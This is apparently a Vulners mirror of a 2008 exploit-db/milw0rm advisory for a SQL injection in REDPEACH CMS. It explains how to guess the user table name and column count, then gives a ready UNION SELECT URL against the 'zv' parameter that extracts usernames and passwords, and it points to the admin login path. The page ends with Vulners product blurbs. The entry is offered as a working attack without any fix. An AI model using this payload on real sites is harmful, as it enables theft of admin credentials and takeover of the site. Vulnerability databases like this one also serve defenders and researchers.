Lucene search
K

REDPEACH CMS - SQL Injection

🗓️ 22 Dec 2008 00:00:00Reported by Lidloses_AugeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

Redpeach CMS SQL Injection Vulnerability discovered in "index.php" and "page.php" with vulnerable SQL Querys at the GET Parameter "zv". Admin panel located at [Target]/admin/login.ph

Code
###############################################################
#
#           REDPEACH CMS - SQL Injection Vulnerability     
#	    http://www.redpeach.de/
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   Palme, GPM, karamble, Free-Hack
#      Date:                        23.12.2008
#
###############################################################
#                                                             
#      Admin Panel: [Target]/admin/login.php
#      Description: The Files "index.php" and "page.php" contain
#		    vulnerable SQL Querys at the GET Parameter "zv".
#		    In the most cases you need a table prefix, which
#		    is similar to the websites' name, so you can guess.
#		    After table prefix there's "_user".
#		    The important column names are "username" and "password".
#		    The number of columns is 8 almost everytime.
#
#      Example:     http://www.website.com/page.php?pageid=1&zv=null+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8+from+website_user+limit+0,1/*
#                                                             
###############################################################

# milw0rm.com [2008-12-22]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation